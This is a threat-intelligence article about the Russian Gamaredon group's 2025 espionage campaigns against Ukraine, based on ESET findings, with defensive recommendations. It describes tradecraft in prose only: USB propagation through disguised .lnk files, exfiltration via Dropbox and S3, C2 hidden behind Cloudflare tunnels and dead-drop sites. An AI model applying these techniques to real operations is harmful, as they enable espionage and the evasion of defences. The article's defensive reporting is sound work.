Most security reports treat advanced persistent threat groups like digital wizards. They paint them as using mythical zero-day exploits and writing elegant, kernel-level rootkits. But Russia's Gamaredon group doesn't work that way. They are a volume shop. Think of them as a highly driven, slightly chaotic software development shop that happens to be run by the FSB. Specifically, the Security Service of Ukraine (SBU) maps Gamaredon to the 18th Center for Information Security inside Russia's Federal Security Service. They do not write beautiful, elegant exploits. Instead, they write sloppy script files, and they deploy them continuously. They build data pipelines designed for raw throughput.
In a new telemetry dump, ESET tracked 35 separate spear-phishing campaigns launched by the group against Ukrainian target environments in 2025. Thirty-five campaigns in a single calendar year is a massive operational tempo. If you run a data pipeline or manage deployments, you know that keeping up that kind of velocity is hard work. It requires templates, automated tooling, and a persistent workforce. And we know they are a standard state shop because of how they take holidays. Gamaredon essentially shut down for the entire month of January 2025. No campaigns. No active development. Why? Because Russian federal holidays cluster heavily in January, and these threat actors are, at the end of the day, government employees who clock out for their winter breaks. SREs know the feeling: nothing gets deployed during a holiday freeze. They resumed operations in February 2025, dedicating the first half of the year to staging their pipelines, building new downloaders, and configuring command-and-control (C2) setups that would pay off in the second half of the year.
Their targets remain highly specific: Ukrainian military units and government departments. The goal is straightforward espionage—siphoning files, mapping intelligence, and extracting text. They do not need zero-days when ordinary human infrastructure has weak points. The group uses phishing emails to drop basic scripts that pull down secondary and tertiary payloads. It is a conveyor belt. If one system blocks a downloader, they deploy another. Let's look at how this conveyor belt functions on a technical level.
Inside PteroPaste and the PowerShell Toolkit
Sloppy code can still achieve complete network compromise if it executes. During the first two quarters of 2025, Gamaredon focused heavily on updating its toolkit. They developed six new PowerShell-based downloaders. Five of these were written and deployed between January and March, with a sixth dropping in the summer. Script-based downloaders are their bread and butter. They are cheap to write, easy to modify, and bypass basic signature detection by changing static strings. But the standout arrival of their 2025 campaign is a tool ESET calls PteroPaste.
PteroPaste is a malicious downloader that does more than pull files. It focuses on lateral physical movement and data exfiltration. The script runs a loop that queries the system for active USB storage drives. Once it detects a drive, it starts copy operations. It selects a legitimate Word document from the user's local folders, appends a .lnk extension to it, and saves its malicious loader using that filename. It is a basic masquerade trick. A user looking at their thumb drive sees what looks like their thesis or budget file, clicks it, and triggers the PowerShell script. SREs and security architects call this file spoofing, but really it is just exploiting the human habit of clicking familiar names.
Gamaredon relies on USB propagation for a practical engineering reason: air gapping. Military and government offices keep high-value assets off the internet. You cannot spear-fish an air-gapped system. But you can get a user to plug a compromised USB drive into it. Once inside, the script collects local data. PteroPaste bypasses standard network exfiltration detection by using Dropbox for storage. It connects to the Dropbox API and uploads stolen data as standard HTTPS traffic. This is a nightmare for network operations. Traditional firewalls see legitimate traffic going to a trusted SaaS platform and let it pass through. They do not block Dropbox because the business uses it. ESET notes that Gamaredon's other stealer variants have been modified to exfiltrate data directly to AWS S3 buckets. Using these massive cloud providers means the traffic blends perfectly into normal web traffic.
Defending against this requires hard restrictions, not just shiny monitoring dashboards. Jean-Ian Boutin, ESET's director of threat research, points out the obvious solution: block non-administrative users from executing PowerShell entirely. If a public sector employee does not write scripts for their day job, their account should not have access to scripting consoles. You should restrict access to Windows Management Instrumentation (WMI) and disable scripting engines that are not actively required. We must also establish USB sanitization stations—isolated kiosks where external media is wiped or inspected before entering network-connected office systems. Or better yet: weld the ports shut.
Tunneling, Dead Drops, and Trusted Cloud Abuses
Deploying malware is only half the battle. If your command-and-control servers get blocked, your campaign dies. Gamaredon's engineers spent the first half of 2025 redesigning their network architecture to evade blocklists. SREs build microservices with load balancers and CDNs to keep systems online; Gamaredon builds C2 networks using the same tools to keep their spyware talking.
They started using tunneling services like Microsoft and Cloudflare tunnels. They also built their infrastructure around Cloudflare serverless workers. These technologies allow them to deploy server endpoints that hide behind legitimate, high-reputation IP addresses. When their malware makes a DNS call, it does not look up a suspicious domain registered in Russia. It calls a Cloudflare Worker. The worker then forwards the traffic to the actual backend server. If you block the IP, you risk blocking large swaths of legitimate Cloudflare traffic. It is a clever shield.
To make blocklists even more useless, Gamaredon routes its command data through dead drop sites. The malware connects to a legitimate, compromised website—like a public forum or a small business blog—to retrieve a dynamic IP address. They place the IP in a hidden comment field or a profile description. The malware reads the page, pulls the IP, and initiates contact with the real C2 server. In late 2025, they started combining these tactics: burying tunneling service domains inside compromised web pages. An analyst tracking the network traffic sees a call to a local garden center blog, then a call to Microsoft, then nothing. It looks like standard user browsing.
This infrastructure shift breaks traditional perimeter security. Louis Eichenbaum, federal CTO at ColorTokens, notes that we can no longer trust traffic simply because it terminates at a safe provider. Dropbox, AWS, and Cloudflare are not malicious, but the accounts sending traffic to them might be. SREs know you cannot rely on network zoning alone. You need granular, identity-aware microsegmentation. You must track application workflows and ensure that only authorized services can reach the internet at all. If a document converter service starts opening outbound connections to AWS S3 or Dropbox, your telemetry should fire instantly. It is about understanding the data pipeline and defining what is normal, rather than keeping a static list of bad IPs.
Tactical Turla Partnerships and Remediation
Gamaredon is not acting alone. The second half of 2025 saw them team up with another notorious Russian state-sponsored group: Turla (also tracked as Snake, Venomous Bear, Waterbug, or Ourobouros). Turla is a higher-tier intelligence unit. They write clean, complex C++ implants and manage long-term operations that require high levels of security. While China-nexus groups often focus on stealthy, long-term persistence—such as UNC6508's year-long undetected spying or UNC5221's persistent access campaigns—Russian operations like Gamaredon run at a much higher frequency, acting as initial access brokers.
In this partnership, Gamaredon functions as the delivery pipeline. They send the spear-phishing emails, compromise the endpoint, and establish initial persistence. Once they have a foothold, they act as the boots on the ground, dropping loader files that deploy Turla's complex Kazuar framework. Kazuar is a modular, highly secure espionage tool with dozens of commands for stealthy execution, threat detection evasion, and cryptographic data protection. SREs would call this modular outsourcing. Gamaredon is the transport layer, and Turla is the database engine. By dividing the labor, both groups increase their operational efficiency. To combat this type of collaboration, defensive security programs are shifting toward disrupting the malware assembly line by uniting legal, technical, and automated strategies.
Defending against this requires real structural shifts in IT administration. It starts with blocking script execution. Non-administrative users do not need access to command prompts, PowerShell, or WMI scripts. If your users operate purely in web browsers and productivity software, lock down their execution policies. Second, USB security is no longer an optional task. Banning unvetted drives or setting up sanitization stations is mandatory. If you cannot scan a drive at the boundary, do not let it touch a workstation. Finally, microsegmentation is the only way to stop the lateral movement of tools like Kazuar. If a single endpoint is compromised, it should not be able to talk to the rest of the subnet. Keep it isolated, monitor the logs, and build pipelines that treat internal traffic with security skepticism.